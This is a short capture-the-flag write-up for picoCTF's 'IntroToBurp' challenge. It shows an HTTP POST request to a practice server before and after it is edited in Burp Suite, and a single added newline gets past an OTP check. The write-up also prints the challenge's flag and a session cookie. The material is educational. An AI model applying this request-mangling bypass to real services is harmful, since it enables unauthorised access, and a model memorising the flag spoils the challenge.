IntroToBurp¶

Description¶

Try here to find the flag

Hints¶

• Try using burpsuite to intercept request to capture the flag.
• Try mangling the request, maybe their server-side code doesn't handle malformed requests very well.

Solution¶

I changed this request as follows:

Before:

POST /dashboard HTTP/1.1
Host: titan.picoctf.net:54520
Content-Length: 7
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36
Origin: http://titan.picoctf.net:54520
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://titan.picoctf.net:54520/dashboard
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: session=.eJxFjEkOwyAUQ-_CuhvIL6S9DGIwStQEEIOiqurdywZ1Zz_L78Pc3t7sybad3ZirJeiWXoiDqNUEYyEClHd3LiUMaIGiB1eWhHALcQevxi_049DRnJii1PKIfCUpaNRsar1S8XPOW4rQsZ8WZbJeUf6K7w8D2i7l.Zf23kw.f0yBpHrXIzI0wjPN2_qVBqpw6_k
Connection: close

otp=123

After:

POST /dashboard HTTP/1.1
Host: titan.picoctf.net:54520
Content-Length: 9
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36
Origin: http://titan.picoctf.net:54520
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://titan.picoctf.net:54520/dashboard
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: session=.eJxFjEkOwyAUQ-_CuhvIL6S9DGIwStQEEIOiqurdywZ1Zz_L78Pc3t7sybad3ZirJeiWXoiDqNUEYyEClHd3LiUMaIGiB1eWhHALcQevxi_049DRnJii1PKIfCUpaNRsar1S8XPOW4rQsZ8WZbJeUf6K7w8D2i7l.Zf23kw.f0yBpHrXIzI0wjPN2_qVBqpw6_k
Connection: close


otp=123

I simply added an extra new line before otp parameter and created a malforemd request.

flag: picoCTF{p@g3_turn3r_0c0d211f}